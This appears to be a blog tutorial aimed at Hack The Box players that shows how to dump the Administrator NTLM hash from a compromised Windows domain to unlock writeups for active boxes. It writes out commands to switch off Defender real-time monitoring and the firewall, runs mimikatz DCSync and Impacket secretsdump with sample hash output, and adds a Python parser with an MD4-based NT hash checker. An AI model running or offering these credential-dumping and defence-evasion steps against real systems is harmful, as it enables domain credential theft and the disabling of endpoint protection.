Preface: If you want to decrypt a writeup for an active Windows box on HTB or another platform using the NTLM hash of the Administrator user, you are in the right place. In this how-to post I will show you how to extract the NTLM hash of the Administrator user (and, in the same way, of any other domain user) on Windows machines.
First we will use mimikatz. In the second example I show you how to use secretsdump from Impacket for the same job.
Using mimikatz
After getting a shell as Administrator on the box, you can follow the steps below to extract the NTLM hash.
First disable Defender's real-time protection if it is enabled (run this from an elevated PowerShell; if Tamper Protection is turned on, Defender ignores the change):
Set-MpPreference -DisableRealtimeMonitoring $true
If the Windows Firewall gets in the way of transferring mimikatz to the box, turn it off for the current profile. Note that this command only changes the firewall; it does nothing to the antivirus:
netsh advfirewall set currentprofile state off
Then run mimikatz with the following arguments. lsadump::dcsync asks a domain controller to replicate the account's secrets over DRSUAPI, so it needs a domain account with replication rights (Domain Admins have them) and only works for domain accounts; to dump another user, change the /user: value:
./mimikatz.exe "lsadump::dcsync /user:administrator"
You will get an output like this:
C:\tmp> ./mimikatz.exe "lsadump::dcsync /user:administrator"
.#####. mimikatz 2.2.0 (x86) #18362 Feb 8 2020 12:26:09
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /user:administrator
[DC] 'domain.LOCAL' will be the domain
[DC] 'machine.domain.LOCAL' will be the DC server
[DC] 'administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 1/24/2020 9:14:15 AM
Object Security ID : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID : 500
Credentials:
Hash NTLM: f9485863c1e9e05851ab40cbb5ab9dff
The value after "Hash NTLM:" is the one we want: f9485863c1e9e05851ab40cbb5ab9dff. Just copy and paste it into the writeup where it is asked for.
Using secretsdump
If you have owned a machine and you have the password of the Administrator user, you can get the NTLM hash from your own box with secretsdump, a script from Impacket. The -just-dc-ntlm flag makes it pull only the NTLM hashes from the domain controller, again over DRSUAPI, so the account needs replication rights on the DC just like with dcsync:
secretsdump.py -just-dc-ntlm domain.local/Administrator:"Mypass"@10.10.10.X
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1b9e07543aa40cbb4ab9dfd:::
Each line has the format printed in the header: domain\uid:rid:lmhash:nthash. Administrator always has RID 500, the third field is the LM hash and the fourth is the NT hash. aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string, which is what you get when LM hashes are disabled (the default on modern Windows), so that part carries no information. The NTLM hash we want is d9485863c1b9e07543aa40cbb4ab9dfd. Just copy and paste it into the writeup where it is asked for.
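Both tools print the NT hash in the middle of other text, and a 32-character hex string is easy to mangle when copying it into a writeup password field. The Python script below is an added example and is not part of the original post, of mimikatz or of Impacket: it pulls the NT hash out of the mimikatz dcsync output above and out of secretsdump's domain\uid:rid:lmhash:nthash lines, flags the empty LM hash and the empty-password NT hash, and recomputes the NT hash from a cleartext password (MD4 over the UTF-16LE string, implemented in pure Python because hashlib's md4 is often unavailable under OpenSSL 3) so that, in the secretsdump case where you already know the password, you can confirm the dumped value belongs to it before using it. The sample output it parses is copied from this post; the Guest line with an empty password is constructed for the example.

```python
import re
import struct

# Well-known constants: the LM hash of an empty/disabled LM password, and the
# NT hash (MD4 of the empty UTF-16LE string) of an empty password.
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"^[0-9a-f]{32}$")


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                          # round 1: F, no constant
            f = (b & c) | (~b & d)
            a = _rotl((a + f + x[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                          # round 2: G, 0x5A827999
            k = (i % 4) * 4 + i // 4                 # word order 0,4,8,12,1,5,...
            g = (b & c) | (b & d) | (c & d)
            a = _rotl((a + g + x[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                          # round 3: H, 0x6ED9EBA1
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            h = b ^ c ^ d
            a = _rotl((a + h + x[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0, c0, d0 = ((a0 + a) & 0xFFFFFFFF, (b0 + b) & 0xFFFFFFFF,
                          (c0 + c) & 0xFFFFFFFF, (d0 + d) & 0xFFFFFFFF)
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), the value stored in SAM / NTDS.DIT."""
    return md4(password.encode("utf-16-le")).hex()


def parse_secretsdump(output: str) -> dict:
    """Parse 'domain\\uid:rid:lmhash:nthash:::' lines into {username: info}."""
    users = {}
    for line in output.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue                                 # banner, [*] lines, Kerberos keys
        lm, nt = parts[2].lower(), parts[3].lower()
        if not (HEX32.match(lm) and HEX32.match(nt)):
            continue
        user = parts[0].split("\\")[-1]              # drop a domain\ prefix if present
        users[user] = {
            "rid": int(parts[1]),
            "lm": lm,
            "nt": nt,
            "lm_disabled": lm == EMPTY_LM_HASH,
            "empty_password": nt == EMPTY_NT_HASH,
        }
    return users


def parse_mimikatz_dcsync(output: str) -> dict:
    """Pull 'SAM Username' and the 'Hash NTLM:' value out of lsadump::dcsync output."""
    user = re.search(r"SAM Username\s*:\s*(\S+)", output)
    nt = re.search(r"Hash NTLM:\s*([0-9a-fA-F]{32})", output)
    if not (user and nt):
        raise ValueError("no NTLM hash found in dcsync output")
    return {"user": user.group(1), "nt": nt.group(1).lower()}


def password_matches(password: str, nt: str) -> bool:
    """True if the cleartext password hashes to the dumped NT hash."""
    return nt_hash(password) == nt.lower()


# Sample output: Administrator line copied from the post, Guest line constructed.
SECRETSDUMP_SAMPLE = """\
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1b9e07543aa40cbb4ab9dfd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

# Sample output: trimmed copy of the mimikatz dcsync output shown in the post.
MIMIKATZ_SAMPLE = """\
mimikatz(commandline) # lsadump::dcsync /user:administrator
[DC] 'domain.LOCAL' will be the domain
SAM Username : Administrator
Object Relative ID : 500
Credentials:
Hash NTLM: f9485863c1e9e05851ab40cbb5ab9dff
"""

if __name__ == "__main__":
    dumped = parse_secretsdump(SECRETSDUMP_SAMPLE)
    for name, info in dumped.items():
        print(f"{name:14} rid={info['rid']} nt={info['nt']} "
              f"lm_disabled={info['lm_disabled']} empty_password={info['empty_password']}")
    dc = parse_mimikatz_dcsync(MIMIKATZ_SAMPLE)
    print(f"dcsync: {dc['user']} nt={dc['nt']}")
    print("Guest has an empty password:", password_matches("", dumped["Guest"]["nt"]))
```

Run it as a script to print the extracted hashes, or import it and feed the real tool output to parse_secretsdump / parse_mimikatz_dcsync. Before pasting a hash into a writeup, password_matches(known_password, nt) is a cheap sanity check that the dump came from the account whose password you recovered.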